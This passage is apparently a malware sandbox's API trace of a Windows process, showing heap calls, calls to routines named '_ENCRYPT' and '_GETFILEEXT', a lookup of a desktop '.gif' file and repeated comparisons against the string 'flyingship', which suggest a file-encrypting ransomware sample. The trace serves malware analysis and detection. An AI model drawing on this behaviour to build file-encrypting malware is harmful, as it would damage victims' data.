HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0164.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0164.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0164.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0164.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0164.381] CloseHandle (hObject=0x138) returned 1 [0164.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0164.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0164.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0164.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0164.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0164.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0164.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0164.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0164.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0164.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0164.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0164.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0164.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0164.382] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0164.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0164.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0164.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0164.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0164.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0164.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0164.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0164.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0164.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0164.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0164.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0164.383] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0164.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0164.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0164.383] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0164.383] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0164.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0164.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0164.383] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0164.383] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0164.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0164.384] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0164.384] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0164.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0164.384] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0164.384] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0164.384] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0164.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0164.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0164.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0164.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0164.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0164.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0164.385] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4262450, ftCreationTime.dwHighDateTime=0x1d5def5, ftLastAccessTime.dwLowDateTime=0x8e9e2530, ftLastAccessTime.dwHighDateTime=0x1d5e74b, ftLastWriteTime.dwLowDateTime=0x8e9e2530, ftLastWriteTime.dwHighDateTime=0x1d5e74b, nFileSizeHigh=0x0, nFileSizeLow=0xbc0c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="E5mhIaTvFij2bqaC0v.gif", cAlternateFileName="E5MHIA~1.GIF")) returned 0x90add8 [0164.387] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0164.387] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0164.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0164.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0164.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0164.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0164.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0164.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0164.388] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4262450, ftCreationTime.dwHighDateTime=0x1d5def5, ftLastAccessTime.dwLowDateTime=0x8e9e2530, ftLastAccessTime.dwHighDateTime=0x1d5e74b, ftLastWriteTime.dwLowDateTime=0x8e9e2530, ftLastWriteTime.dwHighDateTime=0x1d5e74b, nFileSizeHigh=0x0, nFileSizeLow=0xbc0c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="E5mhIaTvFij2bqaC0v.gif", cAlternateFileName="E5MHIA~1.GIF")) returned 0x90add8 [0164.388] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0164.388] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0164.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0164.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0164.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0164.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.388] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.388] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.388] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.388] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="valtBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="altBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tBR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BR8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VLK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LK\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mhIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hIaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IaTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aTvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TvFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vFij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ij2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j2bqaC0v.gif\"", 